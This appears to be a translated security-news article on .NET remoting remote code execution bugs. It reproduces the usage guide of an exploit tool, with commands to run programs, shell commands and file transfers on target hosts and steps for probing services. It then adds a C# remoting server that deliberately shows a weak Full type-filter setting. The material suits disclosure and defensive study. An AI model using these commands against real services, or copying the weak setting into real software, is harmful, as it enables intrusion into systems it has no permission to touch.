Vulnerability warning: .NET Remote Code Execution Vulnerability (including EXP)
Last week Microsoft announced the good news that .NET is going open source. The release covers the .NET Framework libraries, the .NET Core framework libraries and the RyuJIT compiler, so developers can see exactly what runs their .NET programs. Application developers were pleased, although for them not much changes ...... The key point is that security researchers were pleased too: in the past two days a remote code execution vulnerability in .NET has been disclosed.
About the vulnerability discoverer
This is the latest research result from a British security researcher who had earlier found vulnerabilities in the Windows 8.1 Preview, for which Microsoft officially paid him a $100,000 reward.
We can call him Mr Forshaw, 34 years old and living in London. In an interview, Mr Forshaw said:
"I spent about three and a half weeks on the research in total, because I made some mistakes at the start. I had come up with a lot of ideas before, and I succeeded. It took only two weeks from the initial concept to the product I finally sent to Microsoft. I have more than 10 years of experience in this field."
.NET remote code execution vulnerability EXP
The security tools and procedures (methods) provided below may be offensive in nature and are made available only for security research and teaching. Use them at your own risk!
ExploitRemotingService (c) 2014 James Forshaw
============================================

This is an exploitation tool for vulnerable .NET remoting services; it allows code to be executed remotely on the host of the service. The related vulnerabilities are CVE-2014-1806 and CVE-2014-4149. It only works on Windows, although some aspects may be able to run against Mono on *nix.

Usage:
    ExploitRemotingService [options] uri command [command args]

Copyright (c) James Forshaw 2014

URI:
Below are some supported URIs:
    tcp://host:port/ObjName - TCP connection to host and port
    ipc://channel/ObjName   - Named pipe channel

Options:
    -s, --secure          Enable secure mode
    -p, --port=VALUE      Specify the local TCP port to listen on
    -i, --ipc=VALUE       Specify listening pipe name for IPC channel
    --user=VALUE          Specify username for secure mode
    --pass=VALUE          Specify password for secure mode
    --ver=VALUE           Specify version number for remote, 2 or 4
    --usecom              Use DCOM backchannel instead of .NET remoting
    --remname=VALUE       Specify the remote object name to register
    -v, --verbose         Enable verbose debug output
    --useser              Uses old serialization tricks, only works on full type filter services
    -h, -?, --help        Show help

Commands:
    exec [-wait] program [cmdline] : Execute a process on the hosting server
    cmd cmdline                    : Execute a command line process and display stdout
    put localfile remotefile       : Upload a file to the hosting server
    get remotefile localfile       : Download a file from the hosting server
    ls remotedir                   : List a remote directory
    run file [args]                : Upload and execute an assembly, calls entry point
    user                           : Print the current username
    ver                            : Print the OS version
The tool supports both remote TCP services and local IPC services. To test or exploit a .NET remoting service you must know the TCP port it listens on (or, for IPC, the pipe name) and the name of the registered service object. These can usually be found in the server or client code; look for calls to:

    RemotingConfiguration.RegisterWellKnownServiceType or Activator.CreateInstance

Then construct a suitable URL. For TCP use the format tcp://hostname:port/ServiceName; for IPC use ipc://NamedPipeName/ServiceName. Start with a simple test:

    ExploitRemotingService SERVICEURL ver
If it succeeds, it should print the operating system version of the host running the .NET service.

If you get an exception instead, the service may have been patched against CVE-2014-1806. In that case, try the COM version:

    ExploitRemotingService -usecom SERVICEURL ver

This works best locally, but it can also work remotely if you are able to modify the COM configuration or disable the firewall. If it still fails, the server is probably running the latest version. You can still try the old serialization tricks, but for these the remote service must have the full type filter level enabled (some services do, especially IPC services):

    ExploitRemotingService -useser SERVICEURL ls c:\
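The following is an added example, not code from the article or from ExploitRemotingService: a minimal .NET Framework remoting server in C# that shows the registration calls the README tells you to look for, how they map onto the tool's URIs, and the two TypeFilterLevel settings the README refers to. The class StatusService, the object name "Status.rem", port 9000 and the pipe name "StatusPipe" are assumptions made up for illustration.

```csharp
// Added example (not from the original article or from ExploitRemotingService):
// a minimal .NET Framework remoting server of the kind the tool targets.
// Requires a reference to System.Runtime.Remoting.dll.
using System;
using System.Collections;
using System.Runtime.Remoting;
using System.Runtime.Remoting.Channels;
using System.Runtime.Remoting.Channels.Ipc;
using System.Runtime.Remoting.Channels.Tcp;
using System.Runtime.Serialization.Formatters;

// The object exposed over remoting. Deriving from MarshalByRefObject is what
// makes it reachable through a channel.
public class StatusService : MarshalByRefObject
{
    public string Ping()
    {
        return "pong from " + Environment.MachineName;
    }
}

public static class Server
{
    public static void Main()
    {
        // TCP channel. TypeFilterLevel.Low is the .NET default and the
        // hardened choice; it restricts which types the binary formatter will
        // deserialize for incoming calls.
        var tcpProvider = new BinaryServerFormatterSinkProvider();
        tcpProvider.TypeFilterLevel = TypeFilterLevel.Low;

        IDictionary tcpProps = new Hashtable();
        tcpProps["port"] = 9000;                       // assumed port
        ChannelServices.RegisterChannel(new TcpServerChannel(tcpProps, tcpProvider), false);

        // IPC (named pipe) channel. TypeFilterLevel.Full is the "full type
        // filter" mode the README says the --useser tricks need; it is shown
        // here for contrast and is the weak setting.
        var ipcProvider = new BinaryServerFormatterSinkProvider();
        ipcProvider.TypeFilterLevel = TypeFilterLevel.Full;

        IDictionary ipcProps = new Hashtable();
        ipcProps["portName"] = "StatusPipe";            // assumed pipe name
        ChannelServices.RegisterChannel(new IpcServerChannel(ipcProps, ipcProvider), false);

        // This is the call the README tells you to grep for. The second
        // argument is the ObjName that goes at the end of the tool's URI:
        //   tcp://host:9000/Status.rem
        //   ipc://StatusPipe/Status.rem
        RemotingConfiguration.RegisterWellKnownServiceType(
            typeof(StatusService), "Status.rem", WellKnownObjectMode.Singleton);

        Console.WriteLine("Remoting server up; press Enter to exit.");
        Console.ReadLine();
    }
}

// Client side: the same URI string shows up in client code, which is the
// other place the README suggests looking for it. Assumed host "localhost".
public static class Client
{
    public static string PingOverTcp()
    {
        var proxy = (StatusService)Activator.GetObject(
            typeof(StatusService), "tcp://localhost:9000/Status.rem");
        return proxy.Ping();
    }
}
```

Two caveats worth keeping in mind when reading the server above against the README. First, the page presents `--useser` as the only mode that requires `TypeFilterLevel.Full`; it describes the default exploit path (CVE-2014-1806) and the `--usecom` path as failing only when the service has been patched, so setting `Low` is good hygiene but is not a substitute for applying Microsoft's fix. Second, the `-s`, `--user` and `--pass` options exist because channels can be registered with `ensureSecurity` set to true (the second argument to `RegisterChannel`), which requires authentication on the connection; a service configured that way is one you would test with those options rather than assume out of reach.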